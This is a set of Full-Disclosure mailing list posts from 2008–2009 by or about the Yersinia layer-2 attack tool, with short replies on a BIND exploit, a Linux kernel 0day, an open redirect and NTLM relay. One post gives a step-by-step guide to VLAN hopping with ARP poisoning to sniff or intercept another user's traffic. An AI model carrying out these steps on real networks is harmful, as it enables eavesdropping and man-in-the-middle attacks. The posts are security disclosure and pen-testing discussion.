>>>> >
>>>> > kcope
>>>> >
>>
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] THISISNOTMYEXPLOIT

[yersinia]

Repost for mailing problem.
On Fri, Jul 31, 2009 at 12:14 AM, yersinia  wrote:
>
> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope  wrote:
>>
>> Hello again,
>> the default setting of 127.in-addr.arpa is a bit weird
>>
>> try
>> ./bind  localhost
>
> Never mind. I have only a warning from gcc because it was necessary to 
> include stdlib.h for malloc.
>
> But, the important thing is that it works as aspected.
>
> Regards
>>
>> lewls
>>
>> XD
>>
>> kcope
>>
>> 2009/7/30 Kingcope :
>> > I own nothing.
>> >
>> > Cheers,
>> >
>> > kcope
>> >

>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] THISISNOTMYEXPLOIT

[yersinia]

On Thu, Jul 30, 2009 at 1:24 PM, Kingcope  wrote:

> Hello again,
> the default setting of 127.in-addr.arpa is a bit weird
>
> try
> ./bind  localhost
>

Never mind. I have only a warning from gcc because it was necessary to
include stdlib.h for malloc.

But, the important thing is that it works as aspected.

Regards

>
> lewls
>
> XD
>
> kcope
>
> 2009/7/30 Kingcope :
> > I own nothing.
> >
> > Cheers,
> >
> > kcope
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gerix Wifi Cracker NG

[yersinia]

On Mon, Jul 27, 2009 at 8:45 PM,  wrote:
> AntiSec is against hetrosexual relations and wifi cracking. AntiSec
> is also against flooding the premier channel for hacker
> communicationsthe full disclosure mailing list, with erroneous
> posts about useless tools. Remember to use chkrootkit for backdoors.

Being peasants is one thing, it makes sense. Being stupid is not. E
makes this popular mailing list an area for people who have nothing to
do and what is worse, to say.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable

[yersinia]

On Fri, Jul 17, 2009 at 4:26 AM, Brad Spengler wrote:
> Title says it all, exploit is at:
> http://grsecurity.net/~spender/cheddar_bay.tgz
>
> Everything is described and explained in the exploit.c file.
> I exploit a bug that by looking at the source is unexploitable;
> I defeat the null ptr dereference protection in the kernel on
> both systems with SELinux and those without.
> I proceed to disable SELinux/AppArmor/LSM/auditing
>
> Exploit works on both 32bit and 64bit kernels.
>
> Links to videos of the exploit in action are present in the exploit
> code.




Awesome, very informative as usual. i have forwarded to dailydave - so
to permit sgrubb to pick it -.and oss security also.
BTW, would be nice and perhaps useful for the casual reader update
with this your comments on
http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/

Best regards

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] nVidia.com [Url Redirection flaw]

[yersinia]

2009/3/24 Rubén Camarero 

> If ATI and nVidia were web content developers, this may be a valid
> argument, but they are not. They are graphics vendors, hardware and
> software. Not to mention the fact that this isn't a "serious" issue. RFI is
> a serious issue, IMHO.
>

Well, not everyone agreed with your opinion.

http://www.owasp.org/index.php/Open_redirect

http://www.xssed.com/article/26/Open_redirect_vulnerabilities_definition_and_prevention/


http://www.net-security.org/dl/insecure/INSECURE-Mag-17.pdf
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows 7 or KDE4?

[yersinia]

Wonderful.

On Fri, Feb 27, 2009 at 1:49 AM, Ivan .  wrote:

> http://olylug.org/read.php?73,13757
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NTLM Multiprotocol Replay attacks

[yersinia]

smbrelay in origin was, some years ago, created by CDC. M$ smb signing do it
historic. This tool is an evolution of this ?

Regards

On Fri, Nov 14, 2008 at 9:37 PM, Andres Tarasco <[EMAIL PROTECTED]> wrote:

> I have published a new proof of concept tool, named "Smbrelay3", that is
> able to replay NTLM authentication from several protocols like
> SMB/HTTP/IMAP/..
> http://www.tarasco.org/security/smbrelay/index.html
>
>
> Andrés Tarascó
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yersinia new version (added 802.1x support/attack)

[Yersinia Authors]

Hello,
just to inform you that there is a new Yersinia version (0.7) with 802.1x
support. In addition, with lots of bugfixes and a new GTK interface.

The entire core has been redeveloped to support easy addition of new
protocols and attacks, and with the new GTK interface the tool is ready
for the masses :)

You can download it from http://www.yersinia.net.

Yersinia 0.7: http://www.yersinia.net/download/yersinia-0.7.tar.gz
Yersinia 0.7 signature:
http://www.yersinia.net/download/yersinia-0.7.tar.gz.asc

Yersinia authors' public key: http://www.yersinia.net/yersinia.asc

As always, any bug, comment, suggestion or doubt, can be send to
[EMAIL PROTECTED]

Thanks

Alfredo Andres (slay) and David Barroso (tomac).





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] VLAN Hopping, myth or reality?

[Yersinia Authors]

Hello,
just some thoughts added to the eternal discussion about VLAN Hopping
(802.1q double encapsulated attacks, trunking, ... see the @stake paper or
the Sean Convery BH presentation)

There are lots of resources in the Internet talking about those attacks in
a theoric way, but we weren't able to find any implementation, so here is
a step by step guide to perform a VLAN Hopping + ARP Poisoning, allowing
an user to sniff and (why not?) perform a mitm attack against other user
in another VLAN.

The tool described here, yersinia, can do this, among other fancy
features.

Note for the network administrators: this attack can be avoided just by
properly configuring your switch DTP settings in each port (disabling
trunking).

Steps:
1.- Start yersinia graphical mode: yersinia -I
2.- Select the network interfaces you want to use ('i')
3.- Wait for some minutes (~3 minutes). If you see DTP traffic, the attack
can be accomplished; if not, we are sorry. We need to set up the trunk: go
to DTP mode (F5 or press 'g'), press 'd' to initialize default values,
then 'x' (attacks) and then '1' ('enabling trunking'); you should be able
to see some other DTP packets.
4.- Switch to 8021.q mode (F6 or press 'g'). There should be some packets
there, most of them related to spanning tree or broadcast traffic. 5.- For
this attack, we need to know:
  a) Victim's VLAN
  b) Victim's gateway IP Addresss.
  c) A host in the victim's network segment that is not alive.
  Press 'd' to initialize default values, and then 'x', then '2' (sending
802.1q arp poisoning). Then fill in those three values, and suddenly, you
should be able to see the traffic generated by the victim and
destination the gateway :)

If you look around yersinia options, there is a useful option that saves
all the traffic in pcap format, so you can sniff the victim network data
and save it automatically in a file.

Of course, this attack can only be performed locally.

We haved tested this attack only against Cisco switches 29xx, so we would
be pleased if we received notifications of working attacks in other Cisco
modeles, or better, other vendors (which is almost impossible since DTP is
Cisco proprietary, but, we've seen HP switches with CDP enabled ;) )

Yersinia: http://yersinia.sourceforge.net

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yersinia, a framework for layer 2 attacks

[Yersinia Authors]

Hi,
we are pleased to announce the release of Yersinia, a framework for (mainly) 
layer 2
attacks. The tool has been presented in BlackHat Europe 2005, so if any of you
could attend the conference will know what it is about.

Yersinia implements several attacks for the following protocols: Spanning
Tree (STP), Cisco Discovery (CDP), Dynamic Host Configuration (DHCP), Hot 
Standby Router (HSRP), Dynamic
Trunking (DTP), 802.1q and VLAN Trunking (VTP), helping the pen-tester in
different tasks, e.g:

- Becoming the root role in the Spanning Tree
- Creating virtual CDP neighbors
- Setting up rogue DHCP Servers
- Becoming the active router in a HSRP scenario
- Enabling trunk 
- Performing ARP spooing over VLAN Hopping
- Adding/deleting VLANs (via VTP)
- more..

It is a multithreaded application with three main modes: command line, network
client and ncurses GUI, allowing multiple users to launch multiple attacks
simultanously.

Besides, you can decode some Cisco propietary protocols like DTP or
VTP!! 

You can download it from http://yersinia.sf.net and send your doubts,
questions, bugs or greetings to [EMAIL PROTECTED]

Best regards and happy trails:)

David Barroso Berrueta
Alfredo Andres Omella
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/